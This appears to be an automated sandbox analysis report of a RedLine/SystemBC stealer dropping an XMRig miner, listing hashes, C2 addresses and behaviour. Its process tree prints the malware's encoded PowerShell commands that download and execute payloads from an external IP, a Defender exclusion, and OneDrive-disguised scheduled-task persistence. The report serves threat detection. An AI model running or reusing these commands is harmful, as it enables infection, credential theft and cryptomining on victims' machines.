Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
04-05-2023 11:08
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
95KB
-
MD5
92e79e8ed958f7289702c96fe03de5a5
-
SHA1
e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
-
SHA256
d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
-
SHA512
fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
-
SSDEEP
1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh
Malware Config
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Extracted
systembc
185.161.248.16:4440
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
OneDrive.exeOneDrive.exedescription pid process target process PID 4560 created 3156 4560 OneDrive.exe Explorer.EXE PID 4560 created 3156 4560 OneDrive.exe Explorer.EXE PID 4560 created 3156 4560 OneDrive.exe Explorer.EXE PID 484 created 3156 484 OneDrive.exe Explorer.EXE PID 484 created 3156 484 OneDrive.exe Explorer.EXE PID 484 created 3156 484 OneDrive.exe Explorer.EXE PID 484 created 3156 484 OneDrive.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/484-299-0x00007FF6FB680000-0x00007FF6FC04A000-memory.dmp xmrig behavioral2/memory/3036-308-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-312-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-316-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-321-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-326-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-330-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-334-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-338-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-342-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-346-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig behavioral2/memory/3036-350-0x00007FF7AFCC0000-0x00007FF7B04AF000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 1 2808 powershell.exe 2 3976 powershell.exe 3 2776 powershell.exe 33 2808 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
dllhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
lsass.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation lsass.exe -
Executes dropped EXE 5 IoCs
Processes:
OneDrive.exeOneDrive.exedllhost.exelsass.exelsass.exepid process 4560 OneDrive.exe 484 OneDrive.exe 4352 dllhost.exe 228 lsass.exe 3172 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Wine dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
dllhost.exelsass.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
Processes:
dllhost.exelsass.exelsass.exepid process 4352 dllhost.exe 228 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe 3172 lsass.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exepowershell.exeOneDrive.exedescription pid process target process PID 3976 set thread context of 3460 3976 powershell.exe RegSvcs.exe PID 2776 set thread context of 3916 2776 powershell.exe RegSvcs.exe PID 484 set thread context of 4740 484 OneDrive.exe conhost.exe PID 484 set thread context of 3036 484 OneDrive.exe conhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegSvcs.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3728 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
lsass.exepid process 3172 lsass.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exepowershell.exeRegSvcs.exedllhost.exeOneDrive.exepowershell.exepid process 2464 powershell.exe 2776 powershell.exe 3976 powershell.exe 2808 powershell.exe 3976 powershell.exe 2808 powershell.exe 2776 powershell.exe 2464 powershell.exe 4560 OneDrive.exe 4560 OneDrive.exe 4560 OneDrive.exe 4560 OneDrive.exe 1452 powershell.exe 1452 powershell.exe 1452 powershell.exe 4560 OneDrive.exe 4560 OneDrive.exe 3916 RegSvcs.exe 3916 RegSvcs.exe 3916 RegSvcs.exe 4352 dllhost.exe 4352 dllhost.exe 484 OneDrive.exe 484 OneDrive.exe 484 OneDrive.exe 484 OneDrive.exe 1060 powershell.exe 1060 powershell.exe 1060 powershell.exe 484 OneDrive.exe 484 OneDrive.exe 484 OneDrive.exe 484 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 3460 RegSvcs.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeCreatePagefilePrivilege 1816 powercfg.exe Token: SeShutdownPrivilege 2096 powercfg.exe Token: SeCreatePagefilePrivilege 2096 powercfg.exe Token: SeShutdownPrivilege 3228 powercfg.exe Token: SeCreatePagefilePrivilege 3228 powercfg.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeCreatePagefilePrivilege 2744 powercfg.exe Token: SeIncreaseQuotaPrivilege 1452 powershell.exe Token: SeSecurityPrivilege 1452 powershell.exe Token: SeTakeOwnershipPrivilege 1452 powershell.exe Token: SeLoadDriverPrivilege 1452 powershell.exe Token: SeSystemProfilePrivilege 1452 powershell.exe Token: SeSystemtimePrivilege 1452 powershell.exe Token: SeProfSingleProcessPrivilege 1452 powershell.exe Token: SeIncBasePriorityPrivilege 1452 powershell.exe Token: SeCreatePagefilePrivilege 1452 powershell.exe Token: SeBackupPrivilege 1452 powershell.exe Token: SeRestorePrivilege 1452 powershell.exe Token: SeShutdownPrivilege 1452 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeSystemEnvironmentPrivilege 1452 powershell.exe Token: SeRemoteShutdownPrivilege 1452 powershell.exe Token: SeUndockPrivilege 1452 powershell.exe Token: SeManageVolumePrivilege 1452 powershell.exe Token: 33 1452 powershell.exe Token: 34 1452 powershell.exe Token: 35 1452 powershell.exe Token: 36 1452 powershell.exe Token: SeIncreaseQuotaPrivilege 1452 powershell.exe Token: SeSecurityPrivilege 1452 powershell.exe Token: SeTakeOwnershipPrivilege 1452 powershell.exe Token: SeLoadDriverPrivilege 1452 powershell.exe Token: SeSystemProfilePrivilege 1452 powershell.exe Token: SeSystemtimePrivilege 1452 powershell.exe Token: SeProfSingleProcessPrivilege 1452 powershell.exe Token: SeIncBasePriorityPrivilege 1452 powershell.exe Token: SeCreatePagefilePrivilege 1452 powershell.exe Token: SeBackupPrivilege 1452 powershell.exe Token: SeRestorePrivilege 1452 powershell.exe Token: SeShutdownPrivilege 1452 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeSystemEnvironmentPrivilege 1452 powershell.exe Token: SeRemoteShutdownPrivilege 1452 powershell.exe Token: SeUndockPrivilege 1452 powershell.exe Token: SeManageVolumePrivilege 1452 powershell.exe Token: 33 1452 powershell.exe Token: 34 1452 powershell.exe Token: 35 1452 powershell.exe Token: 36 1452 powershell.exe Token: SeIncreaseQuotaPrivilege 1452 powershell.exe Token: SeSecurityPrivilege 1452 powershell.exe Token: SeTakeOwnershipPrivilege 1452 powershell.exe Token: SeLoadDriverPrivilege 1452 powershell.exe Token: SeSystemProfilePrivilege 1452 powershell.exe Token: SeSystemtimePrivilege 1452 powershell.exe Token: SeProfSingleProcessPrivilege 1452 powershell.exe Token: SeIncBasePriorityPrivilege 1452 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
lsass.exelsass.exepid process 228 lsass.exe 3172 lsass.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
file.exepowershell.exepowershell.exepowershell.execmd.execmd.exelsass.exeOneDrive.execmd.exedescription pid process target process PID 5028 wrote to memory of 2464 5028 file.exe powershell.exe PID 5028 wrote to memory of 2464 5028 file.exe powershell.exe PID 5028 wrote to memory of 3976 5028 file.exe powershell.exe PID 5028 wrote to memory of 3976 5028 file.exe powershell.exe PID 5028 wrote to memory of 2808 5028 file.exe powershell.exe PID 5028 wrote to memory of 2808 5028 file.exe powershell.exe PID 5028 wrote to memory of 2776 5028 file.exe powershell.exe PID 5028 wrote to memory of 2776 5028 file.exe powershell.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 3976 wrote to memory of 3460 3976 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2776 wrote to memory of 3916 2776 powershell.exe RegSvcs.exe PID 2808 wrote to memory of 4560 2808 powershell.exe OneDrive.exe PID 2808 wrote to memory of 4560 2808 powershell.exe OneDrive.exe PID 1472 wrote to memory of 1816 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 1816 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 2096 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 2096 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 3228 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 3228 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 2744 1472 cmd.exe powercfg.exe PID 1472 wrote to memory of 2744 1472 cmd.exe powercfg.exe PID 2808 wrote to memory of 4352 2808 powershell.exe dllhost.exe PID 2808 wrote to memory of 4352 2808 powershell.exe dllhost.exe PID 2808 wrote to memory of 4352 2808 powershell.exe dllhost.exe PID 2440 wrote to memory of 3452 2440 cmd.exe powercfg.exe PID 2440 wrote to memory of 3452 2440 cmd.exe powercfg.exe PID 2440 wrote to memory of 868 2440 cmd.exe powercfg.exe PID 2440 wrote to memory of 868 2440 cmd.exe powercfg.exe PID 2808 wrote to memory of 228 2808 powershell.exe lsass.exe PID 2808 wrote to memory of 228 2808 powershell.exe lsass.exe PID 2808 wrote to memory of 228 2808 powershell.exe lsass.exe PID 2440 wrote to memory of 2276 2440 cmd.exe powercfg.exe PID 2440 wrote to memory of 2276 2440 cmd.exe powercfg.exe PID 2440 wrote to memory of 5112 2440 cmd.exe powercfg.exe PID 2440 wrote to memory of 5112 2440 cmd.exe powercfg.exe PID 228 wrote to memory of 3336 228 lsass.exe schtasks.exe PID 228 wrote to memory of 3336 228 lsass.exe schtasks.exe PID 228 wrote to memory of 3336 228 lsass.exe schtasks.exe PID 228 wrote to memory of 3172 228 lsass.exe lsass.exe PID 228 wrote to memory of 3172 228 lsass.exe lsass.exe PID 228 wrote to memory of 3172 228 lsass.exe lsass.exe PID 228 wrote to memory of 2540 228 lsass.exe cmd.exe PID 228 wrote to memory of 2540 228 lsass.exe cmd.exe PID 228 wrote to memory of 2540 228 lsass.exe cmd.exe PID 484 wrote to memory of 4740 484 OneDrive.exe conhost.exe PID 2540 wrote to memory of 3728 2540 cmd.exe timeout.exe PID 2540 wrote to memory of 3728 2540 cmd.exe timeout.exe PID 2540 wrote to memory of 3728 2540 cmd.exe timeout.exe PID 484 wrote to memory of 3036 484 OneDrive.exe conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4560 -
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4352 -
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 11:13 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:3336 -
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp12AD.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744 -
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:220
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3452
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:868
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2276
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1060 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4740
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3036
-
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:484
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
410B
MD524cfd42a8de70b38ed70e1f8cf4eda1c
SHA1e447168fd38da9175084b36a06c3e9bbde99064c
SHA25693b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA5125c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
1KB
MD59984f1faa8354cf501562ef615fa84e4
SHA1bd4771b04a00c7c89476b006dca120beb22a2b0a
SHA2567a8e40b84798dba3948e771c5af62f7e5ca0e3d3a263784c344fd33cb4037ddf
SHA51227a0510c5bec92da20fb689aac412ea1758f5c1847776095fd7d232513099212727e22795afd6b5b05fc184e2ae2e1cd9349e52e2f43decd07d6b37fa90c02de
-
Filesize
1KB
MD59984f1faa8354cf501562ef615fa84e4
SHA1bd4771b04a00c7c89476b006dca120beb22a2b0a
SHA2567a8e40b84798dba3948e771c5af62f7e5ca0e3d3a263784c344fd33cb4037ddf
SHA51227a0510c5bec92da20fb689aac412ea1758f5c1847776095fd7d232513099212727e22795afd6b5b05fc184e2ae2e1cd9349e52e2f43decd07d6b37fa90c02de
-
Filesize
1KB
MD5e626cd189fa4b090d16e04149911c607
SHA186f93d8dae0f98f19c2ca0c820f2131489f72339
SHA2560c172445195add1b1b1f2d9b89f421ece21314a4a62c41922edaaac14c98c5e1
SHA512ec8ce22f8184c10f3cd0011cfbc510dff68521fb421c641d443a1f40fdd7615cb0a9ec400129c7fed3df4bd5852fab7e2c0da72cc57b08c7482dfe2f393a889e
-
Filesize
1KB
MD58b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1a9122eb088176912311fc0f8eb0b8f020693d259
SHA2568a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA51247e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
154B
MD5797b07c881f4fb3dfa8e8790c0127341
SHA15433e3aad745b66b620cf46ad1d19e1157e9eeaa
SHA256328be908af085d8dc109ac07642e2ba914ba9605a16ace34ad13ed3be4d8219e
